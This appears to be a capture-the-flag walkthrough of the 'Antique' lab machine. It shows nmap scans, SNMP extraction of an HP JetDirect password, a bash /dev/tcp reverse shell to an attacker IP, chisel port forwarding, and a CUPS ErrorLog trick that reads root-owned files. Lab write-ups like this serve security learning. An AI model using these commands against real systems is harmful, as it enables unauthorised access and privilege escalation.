๐ Table of Contents
# Nmap 7.80 scan initiated Sun Nov 21 16:21:03 2021 as: nmap -vvv -p 23 -sS -sV -sC -oN 10.10.11.107.antique.nmap.txt 10.10.11.107
Nmap scan report for 10.10.11.107
Host is up, received echo-reply ttl 63 (0.082s latency).
Scanned at 2021-11-21 16:21:03 PST for 166s
PORT STATE SERVICE REASON VERSION
23/tcp open telnet? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Nov 21 16:23:49 2021 -- 1 IP address (1 host up) scanned in 165.80 seconds
Scanning TCP didn't show up much besides HP JetDirect listening on telnet/23. In the spirit on enumerating further I started a UDP scan of the top 1000 ports which takes a while.
# Nmap 7.80 scan initiated Sun Nov 21 16:19:04 2021 as: nmap -vvv -sU -sV -oN 10.10.11.107.UDP.antique.nmap.txt 10.10.11.107
Increasing send delay for 10.10.11.107 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.11.107
Host is up, received echo-reply ttl 63 (0.080s latency).
Scanned at 2021-11-21 16:19:04 PST for 1093s
Not shown: 999 closed ports
Reason: 999 port-unreaches
PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response SNMPv1 server (public)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Nov 21 16:37:17 2021 -- 1 IP address (1 host up) scanned in 1093.24 seconds
We find that the printer also SNMP ports open and after Google searching we find a few interesting articles about using snmpget to recover the JetDirect password.
How SNMP port works - What is an SNMP port number?
Hacking Network Printers (Mostly HP JetDirects, but a little info on the Ricoh Savins)
$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 [...trimmed the rest is junk...]
$ echo '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33' | xxd -r
P@ssw0rd@123!!123
Once we find this password we can login via telnet and the password. From here we can quickly see that we can run commands. I ran a bash reverse shell on the JetDirect CLI to get a connection back and to get the user.txt flag.
> exec bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/32000 <&1'
This one was a bit tricky. Eventually we found that we were in the lpadmin group and that allows up to administer the cups daemon via a web interface. The web interface was only listening locally so I used chisel to forward the victim machine's port 631 to my attacker box on locahost:8001 so that I could interface with the Administrator UI. I wasn't really sure what to do here but there's a metalsploit module that I eventually found in a writeup after giving up and hitting a wall. The module essentially uses cupsctl to set the ErrorLog file to any arbitrary file that we'd like to read.
metasploit-framework/cups_root_file_read.rb at master ยท rapid7/metasploit-framework
On the victim machine I simply ran the following command: cupsctl ErrorLog=/root/root.txt and visited the error log page to get the root flag: curl <http://localhost:631/admin/log/error_log?>.